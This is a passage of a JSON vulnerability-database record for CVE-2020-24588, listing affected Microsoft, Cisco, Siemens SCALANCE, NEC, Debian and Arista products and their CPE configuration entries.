        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1803"
      },
      {
        "model": "aironet ap803",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1109-4p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1101-4p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1542i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 70 dual",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w722-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "microsoft windows rt 8.1",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "802.11",
        "scope": null,
        "trust": 0.8,
        "vendor": "ieee",
        "version": null
      },
      {
        "model": "microsoft windows 7",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "mac80211",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "microsoft windows server 2016",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "microsoft windows 10",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "aterm",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u672c\u96fb\u6c17",
        "version": null
      },
      {
        "model": "microsoft windows 8.1",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "microsoft windows server 2019",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "microsoft windows server 2008",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      },
      {
        "model": "nec ai accelerator",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u672c\u96fb\u6c17",
        "version": null
      },
      {
        "model": "microsoft windows server 2012",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ieee:ieee_802.11:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:linux:mac80211:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1748-1_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1748-1:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1750d_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1750d:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1788-1_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1788-1:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1788-2_firmware:-:*:*:*:*:*:eec_m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1788-2:-:*:*:*:*:*:eec_m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1788-2_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1788-2:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1788-2ia_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1788-2ia:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w721-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w721-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w722-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w722-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w734-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w734-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w738-1_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w738-1:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w748-1_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w748-1:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w748-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w748-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w761-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w761-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w774-1_firmware:-:*:*:*:*:*:m12_eec:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w774-1:-:*:*:*:*:*:m12_eec:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w774-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w774-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w778-1_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w778-1:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w778-1_firmware:-:*:*:*:*:*:m12_eec:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w778-1:-:*:*:*:*:*:m12_eec:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w786-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w786-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w786-2_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w786-2:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w786-2_firmware:-:*:*:*:*:*:sfp:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w786-2:-:*:*:*:*:*:sfp:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w786-2ia_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w786-2ia:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w788-1_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w788-1:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w788-1_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w788-1:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w788-2_firmware:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w788-2:-:*:*:*:*:*:m12:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w788-2_firmware:-:*:*:*:*:*:m12_eec:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w788-2:-:*:*:*:*:*:m12_eec:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w788-2_firmware:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w788-2:-:*:*:*:*:*:rj45:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wam763-1_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wam763-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wam766-1_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wam766-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wam766-1_firmware:-:*:*:*:*:*:eec:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wam766-1:-:*:*:*:*:*:eec:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wam766-1_6ghz_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wam766-1_6ghz:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wam766-1_6ghz_firmware:-:*:*:*:*:*:eec:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wam766-1_6ghz:-:*:*:*:*:*:eec:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wum763-1_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wum763-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wum766-1_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wum766-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_wum766-1_6ghz_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_wum766-1_6ghz:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-100_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-110_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-110:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-120_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-120:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-130_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-130:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-230_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-230:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-235_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-235:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-250_firmware:-:*:*:*:*:*:*:*",
